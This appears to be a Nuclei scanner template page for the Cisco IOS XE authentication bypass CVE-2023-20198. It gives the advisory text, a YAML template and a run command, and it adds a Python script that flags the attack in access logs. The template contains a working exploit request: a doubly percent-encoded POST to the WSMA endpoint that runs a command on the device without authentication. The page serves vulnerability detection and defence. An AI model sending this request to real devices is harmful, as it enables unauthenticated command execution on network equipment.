Cisco IOS XE - Authentication Bypass
ID: CVE-2023-20198
Severity: critical
Author: iamnoooob,rootxharsh,pdresearch
Tags: cve2023,cve,kev,cisco,rce,auth-bypass
Description
Cisco is aware of active exploitation of a previously unknown vulnerability in the web UI feature of Cisco IOS XE Software when exposed to the internet or to untrusted networks. This vulnerability allows a remote, unauthenticated attacker to create an account on an affected system with privilege level 15 access. The attacker can then use that account to gain control of the affected system. For steps to close the attack vector for this vulnerability, see the Recommendations section of this advisory. Cisco will provide updates on the status of this investigation and when a software patch is available.
YAML Source
id: CVE-2023-20198

info:
  name: Cisco IOS XE - Authentication Bypass
  author: iamnoooob,rootxharsh,pdresearch
  severity: critical
  description: |
    Cisco is aware of active exploitation of a previously unknown vulnerability in the web UI feature of Cisco IOS XE Software when exposed to the internet or to untrusted networks. This vulnerability allows a remote, unauthenticated attacker to create an account on an affected system with privilege level 15 access. The attacker can then use that account to gain control of the affected system. For steps to close the attack vector for this vulnerability, see the Recommendations section of this advisory. Cisco will provide updates on the status of this investigation and when a software patch is available.
  impact: |
    The CVE-2023-20198 vulnerability has a high impact on the system, allowing remote attackers to execute arbitrary code or cause a denial of service.
  remediation: |
    Apply the latest security patches or updates provided by the vendor to fix the CVE-2023-20198 vulnerability.
  reference:
    - https://www.horizon3.ai/cisco-ios-xe-cve-2023-20198-deep-dive-and-poc/
    - https://arstechnica.com/security/2023/10/actively-exploited-cisco-0-day-with-maximum-10-severity-gives-full-network-control/
    - https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-iosxe-webui-privesc-j22SaA4z
    - https://www.cisa.gov/guidance-addressing-cisco-ios-xe-web-ui-vulnerabilities
    - https://www.darkreading.com/vulnerabilities-threats/critical-unpatched-cisco-zero-day-bug-active-exploit
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
    cvss-score: 10
    cve-id: CVE-2023-20198
    epss-score: 0.92151
    epss-percentile: 0.98755
    cpe: cpe:2.3:o:cisco:ios_xe:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: cisco
    product: ios_xe
    shodan-query: http.html_hash:1076109428
    note: this template confirms vulnerable host with limited unauthenticated command execution, this does not include admin user creation + arbitrary cmd execution.
  tags: cve2023,cve,kev,cisco,rce,auth-bypass

variables:
  cmd: uname -a

http:
  - raw:
      - |-
        POST /%2577eb%2575i_%2577sma_Http HTTP/1.1
        Host: {{Hostname}}

        <?xml version="1.0"?>
        <SOAP:Envelope xmlns:SOAP="http://schemas.xmlsoap.org/soap/envelope/" xmlns:SOAP-ENC="http://schemas.xmlsoap.org/soap/encoding/" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance">
          <SOAP:Header>
            <wsse:Security xmlns:wsse="http://schemas.xmlsoap.org/ws/2002/04/secext">
              <wsse:UsernameToken SOAP:mustUnderstand="false">
                <wsse:Username>admin</wsse:Username><wsse:Password>*****</wsse:Password>
              </wsse:UsernameToken>
            </wsse:Security>
          </SOAP:Header>
          <SOAP:Body>
            <request correlator="exec1" xmlns="urn:cisco:wsma-exec">
              <execCLI xsd="false"><cmd>{{cmd}}</cmd><dialogue><expect></expect><reply></reply></dialogue></execCLI>
            </request>
          </SOAP:Body>
        </SOAP:Envelope>

    matchers:
      - type: regex
        part: body
        regex:
          - XMLSchema
          - execLog
          - Cisco Systems
          - <text>
          - <received>
        condition: and

    extractors:
      - type: regex
        part: body
        group: 1
        regex:
          - <text>\n(.*)\[
# digest: 4a0a0047304502203bccffe4789549fdb54f62d4c709777aaa783d325437f6c49800515bf26f74dc022100b75f8c36f33aca6044ef0e12f5de628236ba38f7fb69b933b8bd37c7606b1858:922c64590222798bb761d5b6d8e72950
Guide to check the vulnerabilities
This template detects the vulnerability described above by checking a target for the specific request and response patterns it defines. Run it with the Nuclei tool against the host under test:
$ nuclei -u "URL" -t "http/cves/2023/CVE-2023-20198.yaml"
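The request line in the template reaches the web UI WSMA endpoint through a doubly percent-encoded path (`%2577eb%2575i` decodes to `%77eb%75i`, and only a second decode yields `webui`), so a log filter that decodes a request path once never sees the endpoint name. The following is an added example, not code from the template or from Cisco, showing how a defender can normalise request paths to their fully decoded form before matching them when triaging access logs. The log lines are constructed in a generic access-log shape and are not real device logs; the marker string and helper names are this example's own choices.

```python
"""Added example (not part of the Nuclei template or the vendor's code):
flag access-log requests that reach the IOS XE web UI WSMA endpoint via a
nested percent-encoded path, as the template's request line does."""
import re
from urllib.parse import unquote

# Plain-text form of the endpoint named in the template's request line,
# lower-cased for case-insensitive matching (assumed marker for triage).
WSMA_PATH_MARKER = "webui_wsma_http"

# Constructed sample log lines (generic access-log shape, not real Cisco
# logs): client, timestamp, request line, status.
SAMPLE_LOG_LINES = [
    '203.0.113.10 - - [17/Oct/2023:10:00:01 +0000] "GET /webui/ HTTP/1.1" 200',
    '203.0.113.11 - - [17/Oct/2023:10:00:02 +0000] "POST /%2577eb%2575i_%2577sma_Http HTTP/1.1" 200',
    '203.0.113.12 - - [17/Oct/2023:10:00:03 +0000] "POST /%77eb%75i_wsma_Http HTTP/1.1" 200',
    '203.0.113.13 - - [17/Oct/2023:10:00:04 +0000] "GET /index.html HTTP/1.1" 404',
]

# Pulls method and path out of the quoted request line.
_REQUEST_LINE = re.compile(r'"(?P<method>[A-Z]+) (?P<path>\S+) HTTP/[\d.]+"')


def decode_path_once(path: str) -> str:
    """Single-pass percent-decode: what a naive log filter typically does."""
    return unquote(path)


def decode_path_fully(path: str, max_rounds: int = 5) -> str:
    """Percent-decode until the string stops changing (bounded), so nested
    encodings such as %2577 -> %77 -> 'w' collapse to their final form."""
    current = path
    for _ in range(max_rounds):
        decoded = unquote(current)
        if decoded == current:
            break
        current = decoded
    return current


def hits_wsma_endpoint(path: str) -> bool:
    """True when the fully decoded path names the web UI WSMA endpoint."""
    return WSMA_PATH_MARKER in decode_path_fully(path).lower()


def scan_log_lines(lines):
    """Return (client_ip, raw_path, decoded_path) for every line whose
    request path reaches the WSMA endpoint after full decoding."""
    findings = []
    for line in lines:
        match = _REQUEST_LINE.search(line)
        if not match:
            continue
        raw_path = match.group("path")
        if hits_wsma_endpoint(raw_path):
            client_ip = line.split(" ", 1)[0]
            findings.append((client_ip, raw_path, decode_path_fully(raw_path)))
    return findings


if __name__ == "__main__":
    for ip, raw, decoded in scan_log_lines(SAMPLE_LOG_LINES):
        print(f"{ip} requested {raw!r} -> decodes to {decoded!r}")
```

Running the script lists the two constructed lines whose paths decode to the WSMA endpoint and skips the ordinary `/webui/` and `/index.html` requests. The bounded decode loop matters: a filter that only calls `unquote` once classifies `/%2577eb%2575i_%2577sma_Http` as `/%77eb%75i_%77sma_Http` and misses it, while repeated decoding with a round limit handles both single and nested encodings without looping forever on pathological input.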